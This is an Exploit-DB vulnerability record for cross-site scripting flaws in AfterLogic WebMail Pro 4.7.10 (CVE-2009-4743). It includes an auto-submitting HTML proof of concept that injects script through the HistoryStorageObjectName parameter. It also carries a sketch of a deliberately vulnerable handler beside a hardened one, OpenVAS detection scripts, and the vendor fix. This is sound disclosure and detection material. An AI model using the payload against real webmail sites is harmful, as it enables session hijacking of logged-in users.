AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities
2009-10-06T00:00:00
ID: EDB-ID:33268
Type: exploitdb
Reporter: Sébastien Duquette
Modified: 2009-10-06T00:00:00
Description
AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities. CVE-2009-4743. Webapps exploit for asp platform
source: http://www.securityfocus.com/bid/36605/info
AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
AfterLogic WebMail Pro 4.7.10 and prior versions are affected.
<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/>
</form>
</body>
</html>
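The proof-of-concept value contains no HTML tags, which suggests the parameter is echoed into script source rather than into markup. The sketch below is an added example, not code from the advisory or from AfterLogic: the handler shape, the `parent.<name>.restore(...)` sink and all function names are assumptions, used to show that pattern beside a hardened form.

```javascript
// Added example: hypothetical handler, NOT AfterLogic's code. The sink (values
// echoed into an inline <script>) is an assumption inferred from the PoC value.

// Constructed sample input: the two form fields from the proof of concept.
const pocParams = {
  HistoryKey: "value",
  HistoryStorageObjectName: "location; alert('xss'); //",
};

// Assumed vulnerable pattern: both values concatenated into script source.
function renderVulnerable(p) {
  return "<script>parent." + p.HistoryStorageObjectName +
         ".restore('" + p.HistoryKey + "');</script>";
}

// A value used as an object name must be a single plain identifier.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

// Encode a value as a JS string literal that is also safe inside <script>:
// JSON.stringify handles quotes and backslashes; the replace covers
// characters that could close the script element or end a line.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Hardened form: reject a bad object name, encode the key for its context.
function renderHardened(p) {
  const name = String(p.HistoryStorageObjectName ?? "");
  if (!IDENTIFIER.test(name)) {
    return { status: 400, body: "invalid HistoryStorageObjectName" };
  }
  return {
    status: 200,
    body: "<script>parent." + name + ".restore(" +
          jsStringLiteral(p.HistoryKey) + ");</script>",
  };
}
```

The allowlist handles the identifier context and the string encoder handles the literal context; HTML-entity encoding alone would not neutralise a value like the one in the proof of concept, since it contains no markup characters.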
{"id": "EDB-ID:33268", "type": "exploitdb", "bulletinFamily": "exploit", "title": "AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities", "description": "AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities. CVE-2009-4743. Webapps exploit for asp platform", "published": "2009-10-06T00:00:00", "modified": "2009-10-06T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/33268/", "reporter": "S\u00e9bastien Duquette", "references": [], "cvelist": ["CVE-2009-4743"], "lastseen": "2016-02-03T18:50:46", "viewCount": 1, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2016-02-03T18:50:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4743"]}, {"type": "openvas", "idList": ["OPENVAS:100314", "OPENVAS:1361412562310100314"]}, {"type": "exploitdb", "idList": ["EDB-ID:9857"]}], "modified": "2016-02-03T18:50:46", "rev": 2}, "vulnersScore": 5.2}, "sourceHref": "https://www.exploit-db.com/download/33268/", "sourceData": "source: http://www.securityfocus.com/bid/36605/info\r\n\r\nAfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.\r\n\r\nAttacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.\r\n\r\nAfterLogic WebMail Pro 4.7.10 and prior versions are affected. 
\r\n\r\n<html> <head> </head> <body onLoad=\"document.form1.submit()\"> <form name=\"form1\" method=\"post\" action=\"http://www.example.com/history-storage.aspx?param=0.21188772204998574\" onSubmit=\"return false;\"> <input type=\"hidden\" name=\"HistoryKey\" value=\"value\"/> <input type=\"hidden\" name=\"HistoryStorageObjectName\" value=\"location; alert('xss'); //\"/> </form> </body> </html> ", "osvdbidlist": ["58712"]}
{"cve": [{"lastseen": "2020-12-09T19:31:24", "description": "Multiple cross-site scripting (XSS) vulnerabilities in history-storage.aspx in AfterLogic WebMail Pro 4.7.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) HistoryStorageObjectName and (2) HistoryKey parameters.", "edition": 5, "cvss3": {}, "published": "2010-03-26T20:30:00", "title": "CVE-2009-4743", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4743"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:afterlogic:webmail_pro:4.5", "cpe:/a:afterlogic:webmail_pro:4.7.10"], "id": "CVE-2009-4743", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4743", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:afterlogic:webmail_pro:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:afterlogic:webmail_pro:4.7.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:14:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4743"], "description": "AfterLogic WebMail Pro is prone to multiple cross-site scripting\nvulnerabilities because the application fails to sufficiently sanitize\nuser-supplied data.\n\nAttacker-supplied HTML or JavaScript code could run in the context of\nthe affected site, potentially allowing the attacker to steal cookie-\nbased authentication credentials; other attacks are also possible.\n\nAfterLogic WebMail Pro 4.7.10 and prior versions are affected.", "modified": "2016-11-18T00:00:00", "published": 
"2009-10-20T00:00:00", "id": "OPENVAS:100314", "href": "http://plugins.openvas.org/nasl.php?oid=100314", "type": "openvas", "title": "AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: AfterLogic_WebMail_Pro_36605.nasl 4574 2016-11-18 13:36:58Z teissa $\n#\n# AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"AfterLogic WebMail Pro is prone to multiple cross-site scripting\nvulnerabilities because the application fails to sufficiently sanitize\nuser-supplied data.\n\nAttacker-supplied HTML or JavaScript code could run in the context of\nthe affected site, potentially allowing the attacker to steal cookie-\nbased authentication credentials; other attacks are also possible.\n\nAfterLogic WebMail Pro 4.7.10 and prior versions are affected.\";\n\n\ntag_solution = \"Reports indicate that the vendor addressed these issues in WebMail Pro\n4.7.11, but Symantec has not confirmed this. 
Please contact the vendor\nfor more information.\";\n\nif (description)\n{\n script_id(100314);\n script_version(\"$Revision: 4574 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-18 14:36:58 +0100 (Fri, 18 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-20 18:54:22 +0200 (Tue, 20 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4743\");\n script_bugtraq_id(36605);\n\n script_name(\"AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\");\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"AfterLogic_WebMail_Pro_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/36605\");\n script_xref(name : \"URL\" , value : \"http://www.afterlogic.com/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\nif(!can_host_asp(port:port) && !can_host_php(port:port))exit(0);\n\nif(!version = get_kb_item(string(\"www/\", port, \"/AfterLogicWebMailPro\")))exit(0);\nif(!matches = eregmatch(string:version, pattern:\"^(.+) under (/.*)$\"))exit(0);\n\nvers = matches[1];\n\nif(!isnull(vers) && vers >!< \"unknown\") {\n\n if(version_is_less(version: vers, test_version: \"4.7.10\")) {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:40:16", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4743"], "description": "AfterLogic WebMail Pro is prone to multiple cross-site scripting\n vulnerabilities because the application fails to sufficiently sanitize user-supplied data.", "modified": "2019-03-07T00:00:00", "published": "2009-10-20T00:00:00", "id": "OPENVAS:1361412562310100314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100314", "type": "openvas", "title": "AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: AfterLogic_WebMail_Pro_36605.nasl 14031 2019-03-07 10:47:29Z cfischer $\n#\n# AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:afterlogic:mailbee_webmail_pro\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100314\");\n script_version(\"$Revision: 14031 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-20 18:54:22 +0200 (Tue, 20 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4743\");\n script_bugtraq_id(36605);\n\n script_name(\"AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"AfterLogic_WebMail_Pro_detect.nasl\");\n script_mandatory_keys(\"AfterLogicWebMailPro/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution\", value:\"Reports indicate that the vendor addressed these issues in WebMail Pro\n 4.7.11, but Symantec has not confirmed this. 
Please contact the vendor for more information.\");\n\n script_tag(name:\"summary\", value:\"AfterLogic WebMail Pro is prone to multiple cross-site scripting\n vulnerabilities because the application fails to sufficiently sanitize user-supplied data.\");\n\n script_tag(name:\"impact\", value:\"Attacker-supplied HTML or JavaScript code could run in the context of\n the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.\n Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"AfterLogic WebMail Pro 4.7.10 and prior versions are affected.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/36605\");\n script_xref(name:\"URL\", value:\"http://www.afterlogic.com/\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"4.7.10\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-01T11:23:52", "description": "AfterLogic WebMail Pro 4.7.10 xss. CVE-2009-4743. 
Webapps exploit for asp platform", "published": "2009-10-05T00:00:00", "type": "exploitdb", "title": "AfterLogic WebMail Pro 4.7.10 - XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4743"], "modified": "2009-10-05T00:00:00", "id": "EDB-ID:9857", "href": "https://www.exploit-db.com/exploits/9857/", "sourceData": "Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro\r\n\r\nDescription\r\n-------------\r\nAfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection\r\nof malicious code in the context of the application.\r\n\r\nOverview\r\n-----------\r\nQuote from http://www.afterlogic.com/products/webmail-pro :\r\n\"Webmail front-end for your existing POP3/IMAP mail server. Offer your users\r\nthe fast AJAX webmail and innovative calendar with sharing. Stay in control\r\nwith the admin panel and the developer's API.\"\r\n\r\nDetails\r\n--------\r\nVulnerable Product : AfterLogic WebMail Pro <= 4.7.10\r\nVulnerability Type : Cross-Site Scripting (XSS)\r\nAffected page : history-storage.aspx\r\nVulnerable parameters : HistoryKey, HistoryStorageObjectName\r\nDiscovered by :\r\nS\u0102\u0160bastien Duquette (http://intheknow-security.blogspot.com)\r\nGardien Virtuel (www.gardienvirtuel.com)\r\nOriginal Advisory :\r\nhttp://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt\r\n\r\nTimeline\r\n----------\r\nBug Discovered : September 18th, 2009\r\nVendor Advised : September 23rd, 2009\r\nFix made available : September 30th, 2009\r\n\r\nProof of concept\r\n-------------------\r\nThe targeted user must be logged in the webmail. 
This proof of concept was\r\nsuccessfully tested in Firefox 3.5 and Internet Explorer 8.\r\n\r\n<html>\r\n<head>\r\n</head>\r\n<body onLoad=\"document.form1.submit()\">\r\n<form name=\"form1\" method=\"post\"\r\naction=\"http://WEBSITE/history-storage.aspx?param=0.21188772204998574\";\r\nonSubmit=\"return false;\">\r\n<input type=\"hidden\" name=\"HistoryKey\" value=\"value\"/>\r\n<input type=\"hidden\" name=\"HistoryStorageObjectName\" value=\"location;\r\nalert('xss'); //\"/>\r\n</form>\r\n</body>\r\n</html>\r\n\r\nSolution\r\n---------\r\nThe vendor has made available a patched version. Update to AfterLogic\r\nWebmail Pro 4.7.11", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/9857/"}]}